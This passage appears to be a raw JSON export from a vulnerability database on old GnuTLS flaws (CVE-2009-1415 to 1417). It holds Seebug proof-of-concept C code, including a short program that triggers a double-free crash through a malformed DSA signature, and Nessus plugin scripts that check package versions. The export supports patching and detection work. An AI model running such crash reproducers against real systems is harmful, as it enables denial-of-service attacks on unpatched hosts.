&& memcmp (q.data, "\\x01\\x00\\x01", 3) == 0)\r\n printf ("buggy\\n");\r\n else\r\n printf ("success!\\n");\r\n\r\n gnutls_free (p.data);\r\n gnutls_free (q.data);\r\n gnutls_free (g.data);\r\n gnutls_free (y.data);\r\n gnutls_free (x.data);\r\n\r\n gnutls_x509_privkey_deinit (key);\r\n gnutls_global_deinit ();\r\n\r\n return 0;\r\n}\r\n\r\n \n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86226"}, {"lastseen": "2017-11-19T16:44:44", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "GnuTLS 2.6.x libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote DoS", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1415"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86225", "id": "SSV:86225", "sourceData": "\n source: http://www.securityfocus.com/bid/34783/info\r\n\r\nGnuTLS is prone to multiple remote vulnerabilities:\r\n\r\n- A remote code-execution vulnerability\r\n- A denial-of-service vulnerability\r\n- A signature-generation vulnerability\r\n- A signature-verification vulnerability\r\n\r\nAn attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.\r\n\r\nVersions prior to GnuTLS 2.6.6 are vulnerable. \r\n\r\n/*\r\n * Small code to reproduce the CVE-2009-1415 double-free problem.\r\n *\r\n * Build it using:\r\n *\r\n * gcc -o cve-2009-1415 cve-2009-1415.c -lgnutls\r\n *\r\n * If your gnutls library is OK then running it will just print 'success!'.\r\n *\r\n * If your gnutls library is buggy, then running it will crash like this:\r\n *\r\n * ** glibc detected *** ./cve-2009-1415: munmap_chunk(): invalid pointer: 0xb7f80a9c ***\r\n * ======= Backtrace: =========\r\n * ...\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdarg.h>\r\n#include <stdlib.h>\r\n\r\n#include <gnutls/gnutls.h>\r\n\r\nstatic char dsa_cert[] =\r\n "-----BEGIN CERTIFICATE-----\\n"\r\n "MIIDbzCCAtqgAwIBAgIERiYdRTALBgkqhkiG9w0BAQUwGTEXMBUGA1UEAxMOR251\\n"\r\n "VExTIHRlc3QgQ0EwHhcNMDcwNDE4MTMyOTQxWhcNMDgwNDE3MTMyOTQxWjA3MRsw\\n"\r\n "GQYDVQQKExJHbnVUTFMgdGVzdCBzZXJ2ZXIxGDAWBgNVBAMTD3Rlc3QuZ251dGxz\\n"\r\n "Lm9yZzCCAbQwggEpBgcqhkjOOAQBMIIBHAKBgLmE9VqBvhoNxYpzjwybL5u2DkvD\\n"\r\n "dBp/ZK2d8yjFoEe8m1dW8ZfVfjcD6fJM9OOLfzCjXS+7oaI3wuo1jx+xX6aiXwHx\\n"\r\n "IzYr5E8vLd2d1TqmOa96UXzSJY6XdM8exXtLdkOBBx8GFLhuWBLhkOI3b9Ib7GjF\\n"\r\n "WOLmMOBqXixjeOwHAhSfVoxIZC/+jap6bZbbBF0W7wilcQKBgGIGfuRcdgi3Rhpd\\n"\r\n "15fUKiH7HzHJ0vT6Odgn0Zv8J12nCqca/FPBL0PCN8iFfz1Mq12BMvsdXh5UERYg\\n"\r\n "xoBa2YybQ/Dda6D0w/KKnDnSHHsP7/ook4/SoSLr3OCKi60oDs/vCYXpNr2LelDV\\n"\r\n "e/clDWxgEcTvcJDP1hvru47GPjqXA4GEAAKBgA+Kh1fy0cLcrN9Liw+Luin34QPk\\n"\r\n "VfqymAfW/RKxgLz1urRQ1H+gDkPnn8l4EV/l5Awsa2qkNdy9VOVgNpox0YpZbmsc\\n"\r\n "ur0uuut8h+/ayN2h66SD5out+vqOW9c3yDI+lsI+9EPafZECD7e8+O+P90EAXpbf\\n"\r\n "DwiW3Oqy6QaCr9Ivo4GTMIGQMAwGA1UdEwEB/wQCMAAwGgYDVR0RBBMwEYIPdGVz\\n"\r\n "dC5nbnV0bHMub3JnMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA8GA1UdDwEB/wQFAwMH\\n"\r\n "gAAwHQYDVR0OBBYEFL/su87Y6HtwVuzz0SuS1tSZClvzMB8GA1UdIwQYMBaAFOk8\\n"\r\n "HPutkm7mBqRWLKLhwFMnyPKVMAsGCSqGSIb3DQEBBQOBgQBCsrnfD1xzh8/Eih1f\\n"\r\n "x+M0lPoX1Re5L2ElHI6DJpHYOBPwf9glwxnet2+avzgUQDUFwUSxOhodpyeaACXD\\n"\r\n "o0gGVpcH8sOBTQ+aTdM37hGkPxoXjtIkR/LgG5nP2H2JRd5TkW8l13JdM4MJFB4W\\n"\r\n "QcDzQ8REwidsfh9uKAluk1c/KQ==\\n"\r\n "-----END CERTIFICATE-----\\n";\r\n\r\nconst gnutls_datum_t dsa_cert_dat = {\r\n dsa_cert, sizeof (dsa_cert)\r\n};\r\n\r\nint\r\nmain (void)\r\n{\r\n gnutls_x509_crt_t crt;\r\n gnutls_datum_t data = { "foo", 3 };\r\n gnutls_datum_t sig = { "bar", 3 };\r\n int ret;\r\n\r\n gnutls_global_init ();\r\n\r\n ret = gnutls_x509_crt_init (&crt);\r\n if (ret < 0)\r\n return 1;\r\n\r\n ret = gnutls_x509_crt_import (crt, &dsa_cert_dat, GNUTLS_X509_FMT_PEM);\r\n if (ret < 0)\r\n return 1;\r\n\r\n ret = gnutls_x509_crt_verify_data (crt, 0, &data, &sig);\r\n if (ret < 0)\r\n return 1;\r\n\r\n printf ("success!\\n");\r\n\r\n gnutls_x509_crt_deinit (crt);\r\n gnutls_global_deinit ();\r\n\r\n return 0;\r\n}\r\n\r\n\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86225"}], "nessus": [{"lastseen": "2021-01-07T10:49:13", "description": "SecurityFocus reports :\n\nGnuTLS is prone to multiple remote vulnerabilities :\n\n- A remote code-execution vulnerability.\n\n- A denial-of-service vulnerability.\n\n- A signature-generation vulnerability.\n\n- A signature-verification vulnerability.\n\nAn attacker can exploit these issues to potentially execute arbitrary\ncode, trigger denial-of-service conditions, carry out attacks against\ndata signed with weak signatures, and cause clients to accept expired\nor invalid certificates from servers.", "edition": 25, "published": "2009-08-20T00:00:00", "title": "FreeBSD : GnuTLS -- multiple vulnerabilities (b31a1088-460f-11de-a11a-0022156e8794)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "modified": "2009-08-20T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:gnutls", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:gnutls-devel"], "id": "FREEBSD_PKG_B31A1088460F11DEA11A0022156E8794.NASL", "href": "https://www.tenable.com/plugins/nessus/40661", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40661);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_bugtraq_id(34783);\n\n script_name(english:\"FreeBSD : GnuTLS -- multiple vulnerabilities (b31a1088-460f-11de-a11a-0022156e8794)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SecurityFocus reports :\n\nGnuTLS is prone to multiple remote vulnerabilities :\n\n- A remote code-execution vulnerability.\n\n- A denial-of-service vulnerability.\n\n- A signature-generation vulnerability.\n\n- A signature-verification vulnerability.\n\nAn attacker can exploit these issues to potentially execute arbitrary\ncode, trigger denial-of-service conditions, carry out attacks against\ndata signed with weak signatures, and cause clients to accept expired\nor invalid certificates from servers.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/3517\"\n );\n # https://vuxml.freebsd.org/freebsd/b31a1088-460f-11de-a11a-0022156e8794.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c365e5ba\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(255, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"gnutls<2.6.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"gnutls-devel<2.7.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:31", "description": "The remote host is affected by the vulnerability described in GLSA-200905-04\n(GnuTLS: Multiple vulnerabilities)\n\n The following vulnerabilities were found in GnuTLS:\n Miroslav Kratochvil reported that lib/pk-libgcrypt.c does not\n properly handle corrupt DSA signatures, possibly leading to a\n double-free vulnerability (CVE-2009-1415).\n Simon Josefsson\n reported that GnuTLS generates RSA keys stored in DSA structures when\n creating a DSA key (CVE-2009-1416).\n Romain Francoise reported\n that the _gnutls_x509_verify_certificate() function in\n lib/x509/verify.c does not perform time checks, resulting in the\n 'gnutls-cli' program accepting X.509 certificates with validity times\n in the past or future (CVE-2009-1417).\n \nImpact :\n\n A remote attacker could entice a user or automated system to process a\n specially crafted DSA certificate, possibly resulting in a Denial of\n Service condition. NOTE: This issue might have other unspecified impact\n including the execution of arbitrary code. Furthermore, a remote\n attacker could spoof signatures on certificates and the 'gnutls-cli'\n application can be tricked into accepting an invalid certificate.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 27, "published": "2009-05-26T00:00:00", "title": "GLSA-200905-04 : GnuTLS: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "modified": "2009-05-26T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:gnutls"], "id": "GENTOO_GLSA-200905-04.NASL", "href": "https://www.tenable.com/plugins/nessus/38885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200905-04.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38885);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_xref(name:\"GLSA\", value:\"200905-04\");\n\n script_name(english:\"GLSA-200905-04 : GnuTLS: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200905-04\n(GnuTLS: Multiple vulnerabilities)\n\n The following vulnerabilities were found in GnuTLS:\n Miroslav Kratochvil reported that lib/pk-libgcrypt.c does not\n properly handle corrupt DSA signatures, possibly leading to a\n double-free vulnerability (CVE-2009-1415).\n Simon Josefsson\n reported that GnuTLS generates RSA keys stored in DSA structures when\n creating a DSA key (CVE-2009-1416).\n Romain Francoise reported\n that the _gnutls_x509_verify_certificate() function in\n lib/x509/verify.c does not perform time checks, resulting in the\n 'gnutls-cli' program accepting X.509 certificates with validity times\n in the past or future (CVE-2009-1417).\n \nImpact :\n\n A remote attacker could entice a user or automated system to process a\n specially crafted DSA certificate, possibly resulting in a Denial of\n Service condition. NOTE: This issue might have other unspecified impact\n including the execution of arbitrary code. Furthermore, a remote\n attacker could spoof signatures on certificates and the 'gnutls-cli'\n application can be tricked into accepting an invalid certificate.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200905-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All GnuTLS users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/gnutls-2.6.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(255, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/gnutls\", unaffected:make_list(\"ge 2.6.6\"), vulnerable:make_list(\"lt 2.6.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GnuTLS\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:26", "description": "New gnutls packages are available for Slackware 12.0, 12.1, 12.2, and\n-current to fix security issues.", "edition": 22, "published": "2009-05-11T00:00:00", "title": "Slackware 12.0 / 12.1 / 12.2 / current : gnutls (SSA:2009-128-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1415", "CVE-2009-1416"], "modified": "2009-05-11T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.2", "p-cpe:/a:slackware:slackware_linux:gnutls", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1"], "id": "SLACKWARE_SSA_2009-128-01.NASL", "href": "https://www.tenable.com/plugins/nessus/38719", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-128-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38719);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\");\n script_xref(name:\"SSA\", value:\"2009-128-01\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / current : gnutls (SSA:2009-128-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New gnutls packages are available for Slackware 12.0, 12.1, 12.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.405571\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8e80aa0c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(255, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"gnutls\", pkgver:\"2.6.2\", pkgarch:\"i486\", pkgnum:\"2_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"gnutls\", pkgver:\"2.6.2\", pkgarch:\"i486\", pkgnum:\"2_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"gnutls\", pkgver:\"2.6.2\", pkgarch:\"i486\", pkgnum:\"2_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"gnutls\", pkgver:\"2.6.6\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:25", "description": "Multiple vulnerabilities has been found and corrected in gnutls :\n\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation and\nexpiration times of X.509 certificates, which allows remote attackers\nto successfully present a certificate that is (1) not yet valid or (2)\nno longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\n(CVE-2009-1417).\n\nA vulnerability have been discovered and corrected in GnuTLS before\n2.8.2, which could allow man-in-the-middle attackers to spoof\narbitrary SSL servers via a crafted certificate issued by a legitimate\nCertification Authority (CVE-2009-2730).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\n\nThis update fixes this vulnerability.", "edition": 25, "published": "2009-12-04T00:00:00", "title": "Mandriva Linux Security Advisory : gnutls (MDVSA-2009:308)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2730", "CVE-2009-1417"], "modified": "2009-12-04T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libgnutls13", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:lib64gnutls13", "p-cpe:/a:mandriva:linux:gnutls", "p-cpe:/a:mandriva:linux:lib64gnutls-devel", "p-cpe:/a:mandriva:linux:libgnutls-devel"], "id": "MANDRIVA_MDVSA-2009-308.NASL", "href": "https://www.tenable.com/plugins/nessus/42994", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:308. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42994);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1417\", \"CVE-2009-2730\");\n script_bugtraq_id(35952);\n script_xref(name:\"MDVSA\", value:\"2009:308\");\n\n script_name(english:\"Mandriva Linux Security Advisory : gnutls (MDVSA-2009:308)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in gnutls :\n\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation and\nexpiration times of X.509 certificates, which allows remote attackers\nto successfully present a certificate that is (1) not yet valid or (2)\nno longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\n(CVE-2009-1417).\n\nA vulnerability have been discovered and corrected in GnuTLS before\n2.8.2, which could allow man-in-the-middle attackers to spoof\narbitrary SSL servers via a crafted certificate issued by a legitimate\nCertification Authority (CVE-2009-2730).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\n\nThis update fixes this vulnerability.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gnutls13\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgnutls13\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"gnutls-2.0.0-2.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64gnutls-devel-2.0.0-2.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", 